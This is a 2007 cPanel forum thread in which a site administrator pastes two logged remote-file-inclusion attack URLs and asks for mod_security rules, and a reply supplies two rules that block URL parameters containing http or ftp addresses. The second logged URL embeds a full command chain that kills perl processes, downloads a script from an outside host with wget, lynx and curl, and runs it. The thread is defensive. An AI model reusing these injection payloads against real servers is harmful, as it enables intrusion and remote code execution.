Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Mod_security Rule Assistance - Prevent SPAM

Discussion in 'Security' started by Sash, Apr 24, 2007.

  1. Sash

    Sash Well-Known Member

    Joined:
    Feb 18, 2003
    Messages:
    252
    Likes Received:
    0
    Trophy Points:
    166
    Hello,

    Does anyone have a mod_security rule that will block these types of exploits.....?

    http://www.domain.com/index.php?d=http://att4ck3d.xpg.com.br/cmd.txt?&action=cmd&chdir=/tmp

    http://www.domain.com/index.php?d=http://teampcc10.ooblez.com/tool25.txt?&cmd=cd%20/tmp%20;%20killall%20-9%20perl%20;%20killall%20-9%20perl5.8.8%20;%20wget%20http://teampcc10.ooblez.com/sess_0101.txt%20;%20lynx%20http://teampcc10.ooblez.com/sess_0101.txt%20;%20curl%20-o%20sess_0101.txt%20http://teampcc10.ooblez.com/sess_0101.txt%20;%20perl%20sess_0101.txt

    A rule that would prevent people from loading a file from an external URL would be great.

    Thanks,
    MIke
     
  2. Angel78

    Angel78 Well-Known Member

    Joined:
    May 9, 2002
    Messages:
    413
    Likes Received:
    1
    Trophy Points:
    318
    SecFilterSelective REQUEST_URI "index.php\?id=(http|ftp|https)\:/"
    SecFilterSelective REQUEST_URI "=(http|ftp|ftps|https)\:/"
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice